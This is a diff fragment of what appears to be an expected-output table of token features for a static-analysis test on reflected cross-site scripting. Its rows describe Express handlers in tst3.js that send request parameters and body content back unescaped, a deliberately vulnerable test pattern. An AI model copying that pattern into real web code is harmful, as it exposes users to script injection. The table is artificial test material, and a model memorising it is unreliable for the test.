autogenerated/Xss/ReflectedXss/tst3.js:5:15:5:17 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:5:15:5:17 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:5:15:5:17 | req | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:5:15:5:17 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:5:15:5:17 | req | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:5:15:5:24 | req.params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:5:15:5:24 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:5:15:5:24 | req.params | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:5:15:5:24 | req.params | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:5:15:5:24 | req.params | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:5:19:5:24 | params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:5:19:5:24 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:5:19:5:24 | params | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:5:19:5:24 | params | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:5:19:5:24 | params | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:5 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:5 | res | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:5 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:5 | res | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:10 | res.send | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:10 | res.send | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:10 | res.send | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:13 | exceptional return of res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:13 | exceptional return of res.send(p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:13 | exceptional return of res.send(p) | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:13 | exceptional return of res.send(p) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:13 | exceptional return of res.send(p) | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:13 | res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:13 | res.send(p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:13 | res.send(p) | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:13 | res.send(p) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:6:3:6:13 | res.send(p) | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:6:7:6:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:6:7:6:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:6:7:6:10 | send | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:6:7:6:10 | send | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:6:7:6:10 | send | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:6:12:6:12 | p | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst3.js:6:12:6:12 | p | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst3.js:6:12:6:12 | p | contextFunctionInterfaces | | @@ -22259,12 +148163,46 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst3.js:6:12:6:12 | p | enclosingFunctionName | get#functionalargument | | autogenerated/Xss/ReflectedXss/tst3.js:6:12:6:12 | p | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:6:12:6:12 | p | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst3.js:9:7:9:14 | prettier | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:9:7:9:14 | prettier | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:9:7:9:14 | prettier | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:9:7:9:14 | prettier | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:9:7:9:36 | prettie ... ttier") | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:9:7:9:36 | prettie ... ttier") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:9:7:9:36 | prettie ... ttier") | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:9:7:9:36 | prettier | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:9:7:9:36 | prettier | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:9:7:9:36 | prettier | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:9:18:9:24 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:9:18:9:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:9:18:9:24 | require | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:9:18:9:36 | exceptional return of require("prettier") | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:9:18:9:36 | exceptional return of require("prettier") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:9:18:9:36 | exceptional return of require("prettier") | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:9:18:9:36 | require("prettier") | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:9:18:9:36 | require("prettier") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:9:18:9:36 | require("prettier") | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:9:26:9:35 | "prettier" | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/tst3.js:9:26:9:35 | "prettier" | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst3.js:9:26:9:35 | "prettier" | calleeImports | | | autogenerated/Xss/ReflectedXss/tst3.js:9:26:9:35 | "prettier" | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/tst3.js:9:26:9:35 | "prettier" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst3.js:9:26:9:35 | "prettier" | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:10:1:10:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:1:10:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:1:10:3 | app | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:10:1:10:8 | app.post | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:1:10:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:1:10:8 | app.post | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:10:1:13:2 | app.pos ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:1:13:2 | app.pos ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:1:13:2 | app.pos ... T OK\\n}) | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:10:1:13:2 | exceptional return of app.pos ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:1:13:2 | exceptional return of app.pos ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:1:13:2 | exceptional return of app.pos ... T OK\\n}) | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:10:5:10:8 | post | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:5:10:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:5:10:8 | post | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:10:10:10:17 | "foobar" | CalleeFlexibleAccessPath | app.post | | autogenerated/Xss/ReflectedXss/tst3.js:10:10:10:17 | "foobar" | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst3.js:10:10:10:17 | "foobar" | calleeImports | express | @@ -22272,6 +148210,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst3.js:10:10:10:17 | "foobar" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst3.js:10:10:10:17 | "foobar" | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:10:10:10:17 | "foobar" | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:10:19 | prettier | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:10:19 | prettier | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:10:19 | prettier | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:10:19 | prettier | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:10:19 | prettier | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:10:19 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:10:19 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:10:19 | this | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:10:19 | this | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:10:19 | this | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | 'arguments' object of anonymous function | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | 'arguments' object of anonymous function | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | exceptional return of anonymous function | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | exceptional return of anonymous function | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | functio ... OT OK\\n} | calleeImports | express | @@ -22279,6 +148237,76 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (reg, res) | | autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | functio ... OT OK\\n} | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | functio ... OT OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | return of anonymous function | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:10:20:13:1 | return of anonymous function | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:10:30:10:32 | reg | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:30:10:32 | reg | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:30:10:32 | reg | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:30:10:32 | reg | contextSurroundingFunctionParameters | (reg, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:10:30:10:32 | reg | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:10:30:10:32 | reg | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:10:30:10:32 | reg | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:10:30:10:32 | reg | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:10:30:10:32 | reg | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:10:30:10:32 | reg | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:10:35:10:37 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:35:10:37 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:35:10:37 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:10:35:10:37 | res | contextSurroundingFunctionParameters | (reg, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:10:35:10:37 | res | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:10:35:10:37 | res | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:10:35:10:37 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:10:35:10:37 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:10:35:10:37 | res | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:10:35:10:37 | res | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:11:9:11:12 | code | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:9:11:12 | code | contextSurroundingFunctionParameters | (reg, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:11:9:11:12 | code | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:11:9:11:12 | code | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:11:9:11:12 | code | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:11:9:11:74 | code | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:9:11:74 | code | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:9:11:74 | code | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:11:9:11:74 | code | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:11:9:11:74 | code | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:11:9:11:74 | code = ... bel" }) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:9:11:74 | code = ... bel" }) | contextSurroundingFunctionParameters | (reg, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:11:9:11:74 | code = ... bel" }) | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:11:9:11:74 | code = ... bel" }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:11:9:11:74 | code = ... bel" }) | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:23 | prettier | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:23 | prettier | contextSurroundingFunctionParameters | (reg, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:23 | prettier | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:23 | prettier | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:23 | prettier | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:30 | prettier.format | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:30 | prettier.format | contextSurroundingFunctionParameters | (reg, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:30 | prettier.format | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:30 | prettier.format | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:30 | prettier.format | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:74 | exceptional return of prettie ... bel" }) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:74 | exceptional return of prettie ... bel" }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:74 | exceptional return of prettie ... bel" }) | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:74 | exceptional return of prettie ... bel" }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:74 | exceptional return of prettie ... bel" }) | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:74 | prettie ... bel" }) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:74 | prettie ... bel" }) | contextSurroundingFunctionParameters | (reg, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:74 | prettie ... bel" }) | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:74 | prettie ... bel" }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:11:16:11:74 | prettie ... bel" }) | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:11:25:11:30 | format | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:25:11:30 | format | contextSurroundingFunctionParameters | (reg, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:11:25:11:30 | format | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:11:25:11:30 | format | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:11:25:11:30 | format | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:11:32:11:34 | reg | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:32:11:34 | reg | contextSurroundingFunctionParameters | (reg, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:11:32:11:34 | reg | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:11:32:11:34 | reg | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:11:32:11:34 | reg | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:11:32:11:39 | reg.body | CalleeFlexibleAccessPath | prettier.format | | autogenerated/Xss/ReflectedXss/tst3.js:11:32:11:39 | reg.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst3.js:11:32:11:39 | reg.body | calleeImports | prettier | @@ -22288,6 +148316,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst3.js:11:32:11:39 | reg.body | enclosingFunctionName | app.post#functionalargument | | autogenerated/Xss/ReflectedXss/tst3.js:11:32:11:39 | reg.body | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:11:32:11:39 | reg.body | receiverName | prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:11:36:11:39 | body | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:36:11:39 | body | contextSurroundingFunctionParameters | (reg, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:11:36:11:39 | body | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:11:36:11:39 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:11:36:11:39 | body | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:11:42:11:73 | { semi: ... abel" } | CalleeFlexibleAccessPath | prettier.format | | autogenerated/Xss/ReflectedXss/tst3.js:11:42:11:73 | { semi: ... abel" } | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/tst3.js:11:42:11:73 | { semi: ... abel" } | calleeImports | prettier | @@ -22297,6 +148330,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst3.js:11:42:11:73 | { semi: ... abel" } | enclosingFunctionName | app.post#functionalargument | | autogenerated/Xss/ReflectedXss/tst3.js:11:42:11:73 | { semi: ... abel" } | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:11:42:11:73 | { semi: ... abel" } | receiverName | prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:11:44:11:47 | semi | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:44:11:47 | semi | contextSurroundingFunctionParameters | (reg, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:11:44:11:47 | semi | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:11:44:11:47 | semi | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:11:44:11:47 | semi | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:11:44:11:54 | semi: false | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:44:11:54 | semi: false | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:44:11:54 | semi: false | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:44:11:54 | semi: false | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:44:11:54 | semi: false | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:11:44:11:54 | semi: false | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:11:44:11:54 | semi: false | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:11:44:11:54 | semi: false | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:11:44:11:54 | semi: false | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:11:44:11:54 | semi: false | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:11:50:11:54 | false | CalleeFlexibleAccessPath | prettier.format | | autogenerated/Xss/ReflectedXss/tst3.js:11:50:11:54 | false | InputAccessPathFromCallee | 1.semi | | autogenerated/Xss/ReflectedXss/tst3.js:11:50:11:54 | false | InputArgumentIndex | 1 | @@ -22307,6 +148355,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst3.js:11:50:11:54 | false | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | | autogenerated/Xss/ReflectedXss/tst3.js:11:50:11:54 | false | enclosingFunctionName | app.post#functionalargument | | autogenerated/Xss/ReflectedXss/tst3.js:11:50:11:54 | false | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:11:57:11:62 | parser | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:57:11:62 | parser | contextSurroundingFunctionParameters | (reg, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:11:57:11:62 | parser | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:11:57:11:62 | parser | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:11:57:11:62 | parser | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:11:57:11:71 | parser: "babel" | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:57:11:71 | parser: "babel" | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:57:11:71 | parser: "babel" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:57:11:71 | parser: "babel" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:11:57:11:71 | parser: "babel" | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:11:57:11:71 | parser: "babel" | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:11:57:11:71 | parser: "babel" | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:11:57:11:71 | parser: "babel" | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:11:57:11:71 | parser: "babel" | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:11:57:11:71 | parser: "babel" | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:11:65:11:71 | "babel" | CalleeFlexibleAccessPath | prettier.format | | autogenerated/Xss/ReflectedXss/tst3.js:11:65:11:71 | "babel" | InputAccessPathFromCallee | 1.parser | | autogenerated/Xss/ReflectedXss/tst3.js:11:65:11:71 | "babel" | InputArgumentIndex | 1 | @@ -22317,6 +148380,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst3.js:11:65:11:71 | "babel" | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | | autogenerated/Xss/ReflectedXss/tst3.js:11:65:11:71 | "babel" | enclosingFunctionName | app.post#functionalargument | | autogenerated/Xss/ReflectedXss/tst3.js:11:65:11:71 | "babel" | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:5 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:5 | res | contextSurroundingFunctionParameters | (reg, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:5 | res | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:5 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:5 | res | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:10 | res.send | contextSurroundingFunctionParameters | (reg, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:10 | res.send | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:10 | res.send | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:10 | res.send | fileImports | express prettier | +| 